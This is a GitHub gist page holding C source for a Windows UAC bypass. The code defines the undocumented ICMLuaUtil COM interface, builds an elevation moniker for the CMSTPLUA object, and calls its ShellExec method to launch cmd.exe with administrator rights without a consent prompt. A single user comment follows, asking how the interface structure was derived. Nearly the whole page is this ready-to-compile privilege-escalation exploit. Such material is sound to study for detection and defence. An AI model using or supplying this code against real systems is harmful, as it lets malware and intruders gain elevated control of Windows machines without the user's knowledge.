Skip to content

Instantly share code, notes, and snippets.

@hfiref0x
Created August 16, 2017 03:31
Show Gist options
  • Save hfiref0x/196af729106b780db1c73428b5a5d68d to your computer and use it in GitHub Desktop.
Save hfiref0x/196af729106b780db1c73428b5a5d68d to your computer and use it in GitHub Desktop.
UAC bypass using CMSTPLUA COM interface
typedef interface ICMLuaUtil ICMLuaUtil;
typedef struct ICMLuaUtilVtbl {
BEGIN_INTERFACE
HRESULT(STDMETHODCALLTYPE *QueryInterface)(
__RPC__in ICMLuaUtil * This,
__RPC__in REFIID riid,
_COM_Outptr_ void **ppvObject);
ULONG(STDMETHODCALLTYPE *AddRef)(
__RPC__in ICMLuaUtil * This);
ULONG(STDMETHODCALLTYPE *Release)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *Method1)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *Method2)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *Method3)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *Method4)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *Method5)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *Method6)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *ShellExec)(
__RPC__in ICMLuaUtil * This,
_In_ LPCTSTR lpFile,
_In_opt_ LPCTSTR lpParameters,
_In_opt_ LPCTSTR lpDirectory,
_In_ ULONG fMask,
_In_ ULONG nShow
);
HRESULT(STDMETHODCALLTYPE *Method8)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *Method9)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *Method10)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *Method11)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *Method12)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *Method13)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *Method14)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *Method15)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *Method16)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *Method17)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *Method18)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *Method19)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *Method20)(
__RPC__in ICMLuaUtil * This);
END_INTERFACE
} *PICMLuaUtilVtbl;
interface ICMLuaUtil
{
CONST_VTBL struct ICMLuaUtilVtbl *lpVtbl;
};
#define T_CLSID_CMSTPLUA L"{3E5FC7F9-9A51-4367-9063-A120244FBEC7}"
#define T_IID_ICMLuaUtil L"{6EDD6D74-C007-4E75-B76A-E5740995E24C}"
VOID Method41_Test()
{
HRESULT r = E_FAIL;
BOOL bCond = FALSE;
IID xIID_ICMLuaUtil;
CLSID xCLSID_ICMLuaUtil;
ICMLuaUtil *CMLuaUtil = NULL;
BIND_OPTS3 bop;
WCHAR szElevationMoniker[MAX_PATH];
do {
if (CLSIDFromString(T_CLSID_CMSTPLUA, &xCLSID_ICMLuaUtil) != NOERROR) {
break;
}
if (IIDFromString(T_IID_ICMLuaUtil, &xIID_ICMLuaUtil) != S_OK) {
break;
}
RtlSecureZeroMemory(szElevationMoniker, sizeof(szElevationMoniker));
_strcpy(szElevationMoniker, L"Elevation:Administrator!new:");
_strcat(szElevationMoniker, T_CLSID_CMSTPLUA);
RtlSecureZeroMemory(&bop, sizeof(bop));
bop.cbStruct = sizeof(bop);
bop.dwClassContext = CLSCTX_LOCAL_SERVER;
r = CoGetObject(szElevationMoniker, (BIND_OPTS *)&bop, &xIID_ICMLuaUtil, &CMLuaUtil);
if (r != S_OK) {
break;
}
r = CMLuaUtil->lpVtbl->ShellExec(CMLuaUtil, L"C:\\windows\\system32\\cmd.exe", NULL, NULL, SEE_MASK_DEFAULT, SW_SHOW);
} while (bCond);
if (CMLuaUtil != NULL) {
CMLuaUtil->lpVtbl->Release(CMLuaUtil);
}
}
@secxue
Copy link

secxue commented Sep 6, 2022

Hi bro, how is icmluautilvtbl structure generated?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment